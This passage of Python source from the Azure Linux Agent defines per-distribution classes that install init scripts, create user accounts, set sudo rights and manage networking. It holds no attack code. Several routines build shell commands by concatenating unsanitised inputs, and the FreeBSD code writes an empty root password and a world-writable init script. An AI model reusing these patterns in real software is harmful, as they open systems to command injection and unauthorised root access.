ipv4 for {0}: {1}".format(ifName, output)) def setDefaultGateway(self, gateway): Run("/sbin/route add default gw" + gateway, chk_err=False) def routeAdd(self, net, mask, gateway): Run("/sbin/route add -net " + net + " netmask " + mask + " gw " + gateway, chk_err=False) ############################################################ # GentooDistro ############################################################ gentoo_init_file = """\ #!/sbin/runscript command=/usr/sbin/waagent pidfile=/var/run/waagent.pid command_args=-daemon command_background=true name="Azure Linux Agent" depend() { need localmount use logger network after bootmisc modules } """ class gentooDistro(AbstractDistro): """ Gentoo distro concrete class """ def __init__(self): # super(gentooDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_name = 'sshd' self.hostname_file_path = '/etc/conf.d/hostname' self.dhcp_client_name = 'dhcpcd' self.shadow_file_mode = 0o640 self.init_file = gentoo_init_file def publishHostname(self, name): try: if (os.path.isfile(self.hostname_file_path)): r = ReplaceFileContentsAtomic(self.hostname_file_path, "hostname=\"" + name + "\"\n" + "\n".join(filter(lambda a: not a.startswith("hostname="), GetFileContents(self.hostname_file_path).split("\n")))) except: return 1 return r def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o755) def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('rc-update add ' + self.agent_service_name + ' default') def uninstallAgentService(self): return Run('rc-update del ' + self.agent_service_name + ' default') def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def checkPackageInstalled(self, p): if Run('eix -I ^' + p + '$', chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run('eix -u ^' + p + '$', chk_err=False): return 0 else: return 1 def RestartInterface(self, iface): Run("/etc/init.d/net." + iface + " restart") ############################################################ # SuSEDistro ############################################################ suse_init_file = """\ #! /bin/sh # # Azure Linux Agent sysV init script # # Copyright 2013 Microsoft Corporation # Copyright SUSE LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # /etc/init.d/waagent # # and symbolic link # # /usr/sbin/rcwaagent # # System startup script for the waagent # ### BEGIN INIT INFO # Provides: AzureLinuxAgent # Required-Start: $network sshd # Required-Stop: $network sshd # Default-Start: 3 5 # Default-Stop: 0 1 2 6 # Description: Start the AzureLinuxAgent ### END INIT INFO PYTHON=/usr/bin/python WAZD_BIN=/usr/sbin/waagent WAZD_CONF=/etc/waagent.conf WAZD_PIDFILE=/var/run/waagent.pid test -x "$WAZD_BIN" || { echo "$WAZD_BIN not installed"; exit 5; } test -e "$WAZD_CONF" || { echo "$WAZD_CONF not found"; exit 6; } . /etc/rc.status # First reset status of this service rc_reset # Return values acc. to LSB for all commands but status: # 0 - success # 1 - misc error # 2 - invalid or excess args # 3 - unimplemented feature (e.g. reload) # 4 - insufficient privilege # 5 - program not installed # 6 - program not configured # # Note that starting an already running service, stopping # or restarting a not-running service as well as the restart # with force-reload (in case signalling is not supported) are # considered a success. case "$1" in start) echo -n "Starting AzureLinuxAgent" ## Start daemon with startproc(8). If this fails ## the echo return value is set appropriate. startproc -f ${PYTHON} ${WAZD_BIN} -daemon rc_status -v ;; stop) echo -n "Shutting down AzureLinuxAgent" ## Stop daemon with killproc(8) and if this fails ## set echo the echo return value. killproc -p ${WAZD_PIDFILE} ${PYTHON} ${WAZD_BIN} rc_status -v ;; try-restart) ## Stop the service and if this succeeds (i.e. the ## service was running before), start it again. $0 status >/dev/null && $0 restart rc_status ;; restart) ## Stop the service and regardless of whether it was ## running or not, start it again. $0 stop sleep 1 $0 start rc_status ;; force-reload|reload) rc_status ;; status) echo -n "Checking for service AzureLinuxAgent " ## Check status with checkproc(8), if process is running ## checkproc will return with exit status 0. checkproc -p ${WAZD_PIDFILE} ${PYTHON} ${WAZD_BIN} rc_status -v ;; probe) ;; *) echo "Usage: $0 {start|stop|status|try-restart|restart|force-reload|reload}" exit 1 ;; esac rc_exit """ class SuSEDistro(AbstractDistro): """ SuSE Distro concrete class Put SuSE specific behavior here... """ def __init__(self): super(SuSEDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_name = 'sshd' self.kernel_boot_options_file = '/boot/grub/menu.lst' self.hostname_file_path = '/etc/HOSTNAME' self.requiredDeps += ["/sbin/insserv"] self.init_file = suse_init_file self.dhcp_client_name = 'dhcpcd' if ((DistInfo(fullname=1)[0] == 'SUSE Linux Enterprise Server' and DistInfo()[1] >= '12') or \ (DistInfo(fullname=1)[0] == 'openSUSE' and DistInfo()[1] >= '13.2')): self.dhcp_client_name = 'wickedd-dhcp4' self.grubKernelBootOptionsFile = '/boot/grub/menu.lst' self.grubKernelBootOptionsLine = 'kernel' self.getpidcmd = 'pidof ' self.dhcp_enabled = True def checkPackageInstalled(self, p): if Run("rpm -q " + p, chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run("zypper list-updates | grep " + p, chk_err=False): return 1 else: return 0 def installAgentServiceScriptFiles(self): try: SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) except: pass def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('insserv ' + self.agent_service_name) def uninstallAgentService(self): return Run('insserv -r ' + self.agent_service_name) def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def startDHCP(self): Run("service " + self.dhcp_client_name + " start", chk_err=False) def stopDHCP(self): Run("service " + self.dhcp_client_name + " stop", chk_err=False) ############################################################ # redhatDistro ############################################################ redhat_init_file = """\ #!/bin/bash # # Init file for AzureLinuxAgent. # # chkconfig: 2345 60 80 # description: AzureLinuxAgent # # source function library . /etc/rc.d/init.d/functions RETVAL=0 FriendlyName="AzureLinuxAgent" WAZD_BIN=/usr/sbin/waagent start() { echo -n $"Starting $FriendlyName: " $WAZD_BIN -daemon & } stop() { echo -n $"Stopping $FriendlyName: " killproc -p /var/run/waagent.pid $WAZD_BIN RETVAL=$? echo return $RETVAL } case "$1" in start) start ;; stop) stop ;; restart) stop start ;; reload) ;; report) ;; status) status $WAZD_BIN RETVAL=$? ;; *) echo $"Usage: $0 {start|stop|restart|status}" RETVAL=1 esac exit $RETVAL """ class redhatDistro(AbstractDistro): """ Redhat Distro concrete class Put Redhat specific behavior here... """ def __init__(self): super(redhatDistro, self).__init__() self.service_cmd = '/sbin/service' self.ssh_service_restart_option = 'condrestart' self.ssh_service_name = 'sshd' self.hostname_file_path = None if DistInfo()[1] < '7.0' else '/etc/hostname' self.init_file = redhat_init_file self.grubKernelBootOptionsFile = '/boot/grub/menu.lst' self.grubKernelBootOptionsLine = 'kernel' def publishHostname(self, name): super(redhatDistro, self).publishHostname(name) if DistInfo()[1] < '7.0': filepath = "/etc/sysconfig/network" if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("HOSTNAME"), GetFileContents(filepath).split('\n')))) ethernetInterface = MyDistro.GetInterfaceName() filepath = "/etc/sysconfig/network-scripts/ifcfg-" + ethernetInterface if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "DHCP_HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("DHCP_HOSTNAME"), GetFileContents(filepath).split('\n')))) return 0 def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) return 0 def registerAgentService(self): self.installAgentServiceScriptFiles() return Run('chkconfig --add waagent') def uninstallAgentService(self): return Run('chkconfig --del ' + self.agent_service_name) def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def checkPackageInstalled(self, p): if Run("yum list installed " + p, chk_err=False): return 0 else: return 1 def checkPackageUpdateable(self, p): if Run("yum check-update | grep " + p, chk_err=False): return 1 else: return 0 def checkDependencies(self): """ Generic dependency check. Return 1 unless all dependencies are satisfied. """ if DistInfo()[1] < '7.0' and self.checkPackageInstalled('NetworkManager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 try: m = __import__('pyasn1') except ImportError: Error(GuestAgentLongName + " requires python-pyasn1 for your Linux distribution.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 ############################################################ # centosDistro ############################################################ class centosDistro(redhatDistro): """ CentOS Distro concrete class Put CentOS specific behavior here... """ def __init__(self): super(centosDistro, self).__init__() ############################################################ # eulerosDistro ############################################################ class eulerosDistro(redhatDistro): """ EulerOS Distro concrete class Put EulerOS specific behavior here... """ def __init__(self): super(eulerosDistro, self).__init__() ############################################################ # oracleDistro ############################################################ class oracleDistro(redhatDistro): """ Oracle Distro concrete class Put Oracle specific behavior here... """ def __init__(self): super(oracleDistro, self).__init__() ############################################################ # asianuxDistro ############################################################ class asianuxDistro(redhatDistro): """ Asianux Distro concrete class Put Asianux specific behavior here... """ def __init__(self): super(asianuxDistro, self).__init__() ############################################################ # CoreOSDistro ############################################################ class CoreOSDistro(AbstractDistro): """ CoreOS Distro concrete class Put CoreOS specific behavior here... """ CORE_UID = 500 def __init__(self): super(CoreOSDistro, self).__init__() self.requiredDeps += ["/usr/bin/systemctl"] self.agent_service_name = 'waagent' self.init_script_file = '/etc/systemd/system/waagent.service' self.fileBlackList.append("/etc/machine-id") self.dhcp_client_name = 'systemd-networkd' self.getpidcmd = 'pidof ' self.shadow_file_mode = 0o640 self.waagent_path = '/usr/share/oem/bin' self.python_path = '/usr/share/oem/python/bin' self.dhcp_enabled = True if 'PATH' in os.environ: os.environ['PATH'] = "{0}:{1}".format(os.environ['PATH'], self.python_path) else: os.environ['PATH'] = self.python_path if 'PYTHONPATH' in os.environ: os.environ['PYTHONPATH'] = "{0}:{1}".format(os.environ['PYTHONPATH'], self.waagent_path) else: os.environ['PYTHONPATH'] = self.waagent_path def checkPackageInstalled(self, p): """ There is no package manager in CoreOS. Return 1 since it must be preinstalled. """ return 1 def checkDependencies(self): for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def checkPackageUpdateable(self, p): """ There is no package manager in CoreOS. Return 0 since it can't be updated via package. """ return 0 def startAgentService(self): return Run('systemctl start ' + self.agent_service_name) def stopAgentService(self): return Run('systemctl stop ' + self.agent_service_name) def restartSshService(self): """ SSH is socket activated on CoreOS. No need to restart it. """ return 0 def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 def RestartInterface(self, iface): Run("systemctl restart systemd-networkd") def CreateAccount(self, user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin and userentry[2] != self.CORE_UID: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "useradd --create-home --password '*' " + user if expiration != None: command += " --expiredate " + expiration.split('.')[0] if Run(command): Error("Failed to create user account: " + user) return "Failed to create user account: " + user + " (0x07)." else: Log("CreateAccount: " + user + " already exists. Will update password.") if password != None: self.changePass(user, password) try: if password == None: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) NOPASSWD: ALL\n") else: SetFileContents("/etc/sudoers.d/waagent", user + " ALL = (ALL) ALL\n") os.chmod("/etc/sudoers.d/waagent", 0o440) except: Error("CreateAccount: Failed to configure sudo access for user.") return "Failed to configure sudo privileges (0x08)." home = MyDistro.GetHome() if thumbprint != None: dir = home + "/" + user + "/.ssh" CreateDir(dir, user, 0o700) pub = dir + "/id_rsa.pub" prv = dir + "/id_rsa" Run("ssh-keygen -y -f " + thumbprint + ".prv > " + pub) SetFileContents(prv, GetFileContents(thumbprint + ".prv")) for f in [pub, prv]: os.chmod(f, 0o600) ChangeOwner(f, user) SetFileContents(dir + "/authorized_keys", GetFileContents(pub)) ChangeOwner(dir + "/authorized_keys", user) Log("Created user account: " + user) return None def startDHCP(self): Run("systemctl start " + self.dhcp_client_name, chk_err=False) def stopDHCP(self): Run("systemctl stop " + self.dhcp_client_name, chk_err=False) def translateCustomData(self, data): return base64.b64decode(data) def getConfigurationPath(self): return "/usr/share/oem/waagent.conf" ############################################################ # debianDistro ############################################################ debian_init_file = """\ #!/bin/sh ### BEGIN INIT INFO # Provides: AzureLinuxAgent # Required-Start: $network $syslog # Required-Stop: $network $syslog # Should-Start: $network $syslog # Should-Stop: $network $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: AzureLinuxAgent # Description: AzureLinuxAgent ### END INIT INFO . /lib/lsb/init-functions OPTIONS="-daemon" WAZD_BIN=/usr/sbin/waagent WAZD_PID=/var/run/waagent.pid case "$1" in start) log_begin_msg "Starting AzureLinuxAgent..." pid=$( pidofproc $WAZD_BIN ) if [ -n "$pid" ] ; then log_begin_msg "Already running." log_end_msg 0 exit 0 fi start-stop-daemon --start --quiet --oknodo --background --exec $WAZD_BIN -- $OPTIONS log_end_msg $? ;; stop) log_begin_msg "Stopping AzureLinuxAgent..." start-stop-daemon --stop --quiet --oknodo --pidfile $WAZD_PID ret=$? rm -f $WAZD_PID log_end_msg $ret ;; force-reload) $0 restart ;; restart) $0 stop $0 start ;; status) status_of_proc $WAZD_BIN && exit 0 || exit $? ;; *) log_success_msg "Usage: /etc/init.d/waagent {start|stop|force-reload|restart|status}" exit 1 ;; esac exit 0 """ class debianDistro(AbstractDistro): """ debian Distro concrete class Put debian specific behavior here... """ def __init__(self): super(debianDistro, self).__init__() self.requiredDeps += ["/usr/sbin/update-rc.d"] self.init_file = debian_init_file self.agent_package_name = 'walinuxagent' self.dhcp_client_name = 'dhclient' self.getpidcmd = 'pidof ' self.shadow_file_mode = 0o640 def checkPackageInstalled(self, p): """ Check that the package is installed. Return 1 if installed, 0 if not installed. This method of using dpkg-query allows wildcards to be present in the package name. """ if not Run("dpkg-query -W -f='${Status}\n' '" + p + "' | grep ' installed' 2>&1", chk_err=False): return 1 else: return 0 def checkDependencies(self): """ Debian dependency check. python-pyasn1 is NOT needed. Return 1 unless all dependencies are satisfied. NOTE: using network*manager will catch either package name in Ubuntu or debian. """ if self.checkPackageInstalled('network*manager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def checkPackageUpdateable(self, p): if Run("apt-get update ; apt-get upgrade -us | grep " + p, chk_err=False): return 1 else: return 0 def installAgentServiceScriptFiles(self): """ If we are packaged - the service name is walinuxagent, do nothing. """ if self.agent_service_name == 'walinuxagent': return 0 try: SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o744) except OSError as e: ErrorWithPrefix('installAgentServiceScriptFiles', 'Exception: ' + str(e) + ' occured creating ' + self.init_script_file) return 1 return 0 def registerAgentService(self): if self.installAgentServiceScriptFiles() == 0: return Run('update-rc.d waagent defaults') else: return 1 def uninstallAgentService(self): return Run('update-rc.d -f ' + self.agent_service_name + ' remove') def unregisterAgentService(self): self.stopAgentService() return self.uninstallAgentService() def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 ############################################################ # KaliDistro - WIP # Functioning on Kali 1.1.0a so far ############################################################ class KaliDistro(debianDistro): """ Kali Distro concrete class Put Kali specific behavior here... """ def __init__(self): super(KaliDistro, self).__init__() ############################################################ # UbuntuDistro ############################################################ ubuntu_upstart_file = """\ #walinuxagent - start Azure agent description "walinuxagent" author "Ben Howard <ben.howard@canonical.com>" start on (filesystem and started rsyslog) pre-start script WALINUXAGENT_ENABLED=1 [ -r /etc/default/walinuxagent ] && . /etc/default/walinuxagent if [ "$WALINUXAGENT_ENABLED" != "1" ]; then exit 1 fi if [ ! -x /usr/sbin/waagent ]; then exit 1 fi #Load the udf module modprobe -b udf end script exec /usr/sbin/waagent -daemon """ class UbuntuDistro(debianDistro): """ Ubuntu Distro concrete class Put Ubuntu specific behavior here... """ def __init__(self): super(UbuntuDistro, self).__init__() self.init_script_file = '/etc/init/waagent.conf' self.init_file = ubuntu_upstart_file self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log"] self.dhcp_client_name = None self.getpidcmd = 'pidof ' def registerAgentService(self): return self.installAgentServiceScriptFiles() def uninstallAgentService(self): """ If we are packaged - the service name is walinuxagent, do nothing. """ if self.agent_service_name == 'walinuxagent': return 0 os.remove('/etc/init/' + self.agent_service_name + '.conf') def unregisterAgentService(self): """ If we are packaged - the service name is walinuxagent, do nothing. """ if self.agent_service_name == 'walinuxagent': return self.stopAgentService() return self.uninstallAgentService() def deprovisionWarnUser(self): """ Ubuntu specific warning string from Deprovision. """ print("WARNING! Nameserver configuration in /etc/resolvconf/resolv.conf.d/{tail,original} will be deleted.") def deprovisionDeleteFiles(self): """ Ubuntu uses resolv.conf by default, so removing /etc/resolv.conf will break resolvconf. Therefore, we check to see if resolvconf is in use, and if so, we remove the resolvconf artifacts. """ if os.path.realpath('/etc/resolv.conf') != '/run/resolvconf/resolv.conf': Log("resolvconf is not configured. Removing /etc/resolv.conf") self.fileBlackList.append('/etc/resolv.conf') else: Log("resolvconf is enabled; leaving /etc/resolv.conf intact") resolvConfD = '/etc/resolvconf/resolv.conf.d/' self.fileBlackList.extend([resolvConfD + 'tail', resolvConfD + 'original']) for f in os.listdir(LibDir) + self.fileBlackList: try: os.remove(f) except: pass return 0 def getDhcpClientName(self): if self.dhcp_client_name != None: return self.dhcp_client_name if DistInfo()[1] == '12.04': self.dhcp_client_name = 'dhclient3' else: self.dhcp_client_name = 'dhclient' return self.dhcp_client_name def waitForSshHostKey(self, path): """ Wait until the ssh host key is generated by cloud init. """ for retry in range(0, 10): if (os.path.isfile(path)): return True time.sleep(1) Error("Can't find host key: {0}".format(path)) return False ############################################################ # LinuxMintDistro ############################################################ class LinuxMintDistro(UbuntuDistro): """ LinuxMint Distro concrete class Put LinuxMint specific behavior here... """ def __init__(self): super(LinuxMintDistro, self).__init__() ############################################################ # fedoraDistro ############################################################ fedora_systemd_service = """\ [Unit] Description=Azure Linux Agent After=network.target After=sshd.service ConditionFileIsExecutable=/usr/sbin/waagent ConditionPathExists=/etc/waagent.conf [Service] Type=simple ExecStart=/usr/sbin/waagent -daemon [Install] WantedBy=multi-user.target """ class fedoraDistro(redhatDistro): """ FedoraDistro concrete class Put Fedora specific behavior here... """ def __init__(self): super(fedoraDistro, self).__init__() self.service_cmd = '/usr/bin/systemctl' self.hostname_file_path = '/etc/hostname' self.init_script_file = '/usr/lib/systemd/system/' + self.agent_service_name + '.service' self.init_file = fedora_systemd_service self.grubKernelBootOptionsFile = '/etc/default/grub' self.grubKernelBootOptionsLine = 'GRUB_CMDLINE_LINUX=' def publishHostname(self, name): SetFileContents(self.hostname_file_path, name + '\n') ethernetInterface = MyDistro.GetInterfaceName() filepath = "/etc/sysconfig/network-scripts/ifcfg-" + ethernetInterface if os.path.isfile(filepath): ReplaceFileContentsAtomic(filepath, "DHCP_HOSTNAME=" + name + "\n" + "\n".join( filter(lambda a: not a.startswith("DHCP_HOSTNAME"), GetFileContents(filepath).split('\n')))) return 0 def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o644) return Run(self.service_cmd + ' daemon-reload') def registerAgentService(self): self.installAgentServiceScriptFiles() return Run(self.service_cmd + ' enable ' + self.agent_service_name) def uninstallAgentService(self): """ Call service subsystem to remove waagent script. """ return Run(self.service_cmd + ' disable ' + self.agent_service_name) def unregisterAgentService(self): """ Calls self.stopAgentService and call self.uninstallAgentService() """ self.stopAgentService() self.uninstallAgentService() def startAgentService(self): """ Service call to start the Agent service """ return Run(self.service_cmd + ' start ' + self.agent_service_name) def stopAgentService(self): """ Service call to stop the Agent service """ return Run(self.service_cmd + ' stop ' + self.agent_service_name, False) def restartSshService(self): """ Service call to re(start) the SSH service """ sshRestartCmd = self.service_cmd + " " + self.ssh_service_restart_option + " " + self.ssh_service_name retcode = Run(sshRestartCmd) if retcode > 0: Error("Failed to restart SSH service with return code:" + str(retcode)) return retcode def deleteRootPassword(self): return Run("/sbin/usermod root -p '!!'") def packagedInstall(self, buildroot): """ Called from setup.py for use by RPM. Copies generated files waagent.conf, under the buildroot. """ if not os.path.exists(buildroot + '/etc'): os.mkdir(buildroot + '/etc') SetFileContents(buildroot + '/etc/waagent.conf', MyDistro.waagent_conf_file) if not os.path.exists(buildroot + '/etc/logrotate.d'): os.mkdir(buildroot + '/etc/logrotate.d') SetFileContents(buildroot + '/etc/logrotate.d/WALinuxAgent', WaagentLogrotate) self.init_script_file = buildroot + self.init_script_file # this allows us to call installAgentServiceScriptFiles() if not os.path.exists(os.path.dirname(self.init_script_file)): os.mkdir(os.path.dirname(self.init_script_file)) self.installAgentServiceScriptFiles() def CreateAccount(self, user, password, expiration, thumbprint): super(fedoraDistro, self).CreateAccount(user, password, expiration, thumbprint) Run('/sbin/usermod ' + user + ' -G wheel') def DeleteAccount(self, user): Run('/sbin/usermod ' + user + ' -G ""') super(fedoraDistro, self).DeleteAccount(user) ############################################################ # FreeBSD ############################################################ FreeBSDWaagentConf = """\ # # Azure Linux Agent Configuration # Role.StateConsumer=None # Specified program is invoked with the argument "Ready" when we report ready status # to the endpoint server. Role.ConfigurationConsumer=None # Specified program is invoked with XML file argument specifying role configuration. Role.TopologyConsumer=None # Specified program is invoked with XML file argument specifying role topology. Provisioning.Enabled=y # Provisioning.DeleteRootPassword=y # Password authentication for root account will be unavailable. Provisioning.RegenerateSshHostKeyPair=y # Generate fresh host key pair. Provisioning.SshHostKeyPairType=rsa # Supported values are "rsa", "dsa" and "ecdsa". Provisioning.MonitorHostName=y # Monitor host name changes and publish changes via DHCP requests. ResourceDisk.Format=y # Format if unformatted. If 'n', resource disk will not be mounted. ResourceDisk.Filesystem=ufs2 # ResourceDisk.MountPoint=/mnt/resource # ResourceDisk.EnableSwap=n # Create and use swapfile on resource disk. ResourceDisk.SwapSizeMB=0 # Size of the swapfile. LBProbeResponder=y # Respond to load balancer probes if requested by Azure. Logs.Verbose=n # Enable verbose logs OS.RootDeviceScsiTimeout=300 # Root device timeout in seconds. OS.OpensslPath=None # If "None", the system default version is used. """ bsd_init_file = """\ #! /bin/sh # PROVIDE: waagent # REQUIRE: DAEMON cleanvar sshd # BEFORE: LOGIN # KEYWORD: nojail . /etc/rc.subr export PATH=$PATH:/usr/local/bin name="waagent" rcvar="waagent_enable" command="/usr/sbin/${name}" command_interpreter="/usr/local/bin/python" waagent_flags=" daemon &" pidfile="/var/run/waagent.pid" load_rc_config $name run_rc_command "$1" """ bsd_activate_resource_disk_txt = """\ #!/usr/bin/env python import os import sys import imp # waagent has no '.py' therefore create waagent module import manually. __name__='setupmain' #prevent waagent.__main__ from executing waagent=imp.load_source('waagent','/tmp/waagent') waagent.LoggerInit('/var/log/waagent.log','/dev/console') from waagent import RunGetOutput,Run Config=waagent.ConfigurationProvider(None) format = Config.get("ResourceDisk.Format") if format == None or format.lower().startswith("n"): sys.exit(0) device_base = 'da1' device = "/dev/" + device_base for entry in RunGetOutput("mount")[1].split(): if entry.startswith(device + "s1"): waagent.Log("ActivateResourceDisk: " + device + "s1 is already mounted.") sys.exit(0) mountpoint = Config.get("ResourceDisk.MountPoint") if mountpoint == None: mountpoint = "/mnt/resource" waagent.CreateDir(mountpoint, "root", 0755) fs = Config.get("ResourceDisk.Filesystem") if waagent.FreeBSDDistro().mediaHasFilesystem(device) == False : Run("newfs " + device + "s1") if Run("mount " + device + "s1 " + mountpoint): waagent.Error("ActivateResourceDisk: Failed to mount resource disk (" + device + "s1).") sys.exit(0) waagent.Log("Resource disk (" + device + "s1) is mounted at " + mountpoint + " with fstype " + fs) waagent.SetFileContents(os.path.join(mountpoint,waagent.README_FILENAME), waagent.README_FILECONTENT) swap = Config.get("ResourceDisk.EnableSwap") if swap == None or swap.lower().startswith("n"): sys.exit(0) sizeKB = int(Config.get("ResourceDisk.SwapSizeMB")) * 1024 if os.path.isfile(mountpoint + "/swapfile") and os.path.getsize(mountpoint + "/swapfile") != (sizeKB * 1024): os.remove(mountpoint + "/swapfile") if not os.path.isfile(mountpoint + "/swapfile"): Run("umask 0077 && dd if=/dev/zero of=" + mountpoint + "/swapfile bs=1024 count=" + str(sizeKB)) if Run("mdconfig -a -t vnode -f " + mountpoint + "/swapfile -u 0"): waagent.Error("ActivateResourceDisk: Configuring swap - Failed to create md0") if not Run("swapon /dev/md0"): waagent.Log("Enabled " + str(sizeKB) + " KB of swap at " + mountpoint + "/swapfile") else: waagent.Error("ActivateResourceDisk: Failed to activate swap at " + mountpoint + "/swapfile") """ class FreeBSDDistro(AbstractDistro): """ """ def __init__(self): """ Generic Attributes go here. These are based on 'majority rules'. This __init__() may be called or overriden by the child. """ super(FreeBSDDistro, self).__init__() self.agent_service_name = os.path.basename(sys.argv[0]) self.selinux = False self.ssh_service_name = 'sshd' self.ssh_config_file = '/etc/ssh/sshd_config' self.hostname_file_path = '/etc/hostname' self.dhcp_client_name = 'dhclient' self.requiredDeps = ['route', 'shutdown', 'ssh-keygen', 'pw' , 'openssl', 'fdisk', 'sed', 'grep', 'sudo'] self.init_script_file = '/etc/rc.d/waagent' self.init_file = bsd_init_file self.agent_package_name = 'WALinuxAgent' self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log", '/etc/resolv.conf'] self.agent_files_to_uninstall = ["/etc/waagent.conf"] self.grubKernelBootOptionsFile = '/boot/loader.conf' self.grubKernelBootOptionsLine = '' self.getpidcmd = 'pgrep -n' self.mount_dvd_cmd = 'dd bs=2048 count=33 skip=295 if=' # custom data max len is 64k self.sudoers_dir_base = '/usr/local/etc' self.waagent_conf_file = FreeBSDWaagentConf def installAgentServiceScriptFiles(self): SetFileContents(self.init_script_file, self.init_file) os.chmod(self.init_script_file, 0o777) AppendFileContents("/etc/rc.conf", "waagent_enable='YES'\n") return 0 def registerAgentService(self): self.installAgentServiceScriptFiles() return Run("services_mkdb " + self.init_script_file) def sshDeployPublicKey(self, fprint, path): """ We support PKCS8. """ if Run("ssh-keygen -i -m PKCS8 -f " + fprint + " >> " + path): return 1 else: return 0 def deleteRootPassword(self): """ BSD root password removal. """ filepath = "/etc/master.passwd" ReplaceStringInFile(filepath, r'root:.*?:', 'root::') # ReplaceFileContentsAtomic(filepath,"root:*LOCK*:14600::::::\n" # + "\n".join(filter(lambda a: not a.startswith("root:"),GetFileContents(filepath).split('\n')))) os.chmod(filepath, self.shadow_file_mode) if self.isSelinuxSystem(): self.setSelinuxContext(filepath, 'system_u:object_r:shadow_t:s0') RunGetOutput("pwd_mkdb -u root /etc/master.passwd") Log("Root password deleted.") return 0 def changePass(self, user, password): return RunSendStdin("pw usermod " + user + " -h 0 ", password, log_cmd=False) def load_ata_piix(self): return 0 def unload_ata_piix(self): return 0 def checkDependencies(self): """ FreeBSD dependency check. Return 1 unless all dependencies are satisfied. """ for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def packagedInstall(self, buildroot): pass def GetInterfaceName(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() return iface def RestartInterface(self, iface): Run("service netif restart") def GetIpv4Address(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() return inet def GetMacAddress(self): """ Return the ip of the active ethernet interface. """ iface, inet, mac = self.GetFreeBSDEthernetInfo() l = mac.split(':') r = [] for i in l: r.append(string.atoi(i, 16)) return r def GetFreeBSDEthernetInfo(self): """ There is no SIOCGIFCONF on freeBSD - just parse ifconfig. Returns strings: iface, inet4_addr, and mac or 'None,None,None' if unable to parse. We will sleep and retry as the network must be up. """ code, output = RunGetOutput("ifconfig", chk_err=False) Log(output) retries = 10 cmd = 'ifconfig | grep -A2 -B2 ether | grep -B3 inet | grep -A4 UP ' code = 1 while code > 0: if code > 0 and retries == 0: Error("GetFreeBSDEthernetInfo - Failed to detect ethernet interface") return None, None, None code, output = RunGetOutput(cmd, chk_err=False) retries -= 1 if code > 0 and retries > 0: Log("GetFreeBSDEthernetInfo - Error: retry ethernet detection " + str(retries)) if retries == 9: c, o = RunGetOutput("ifconfig | grep -A1 -B2 ether", chk_err=False) if c == 0: t = o.replace('\n', ' ') t = t.split() i = t[0][:-1] Log(RunGetOutput('id')[1]) Run('dhclient ' + i) time.sleep(10) j = output.replace('\n', ' ') j = j.split() iface = j[0][:-1] for i in range(len(j)): if j[i] == 'inet': inet = j[i + 1] elif j[i] == 'ether': mac = j[i + 1] return iface, inet, mac def CreateAccount(self, user, password, expiration, thumbprint): """ Create a user account, with 'user', 'password', 'expiration', ssh keys and sudo permissions. Returns None if successful, error string on failure. """ userentry = None try: userentry = pwd.getpwnam(user) except: pass uidmin = None try: if os.path.isfile("/etc/login.defs"): uidmin = int(GetLineStartingWith("UID_MIN", "/etc/login.defs").split()[1]) except: pass if uidmin == None: uidmin = 100 if userentry != None and userentry[2] < uidmin: Error("CreateAccount: " + user + " is a system user. Will not set password.") return "Failed to set password for system user: " + user + " (0x06)." if userentry == None: command = "pw useradd " + user + " -m" if expiration != None: command += " -e " + 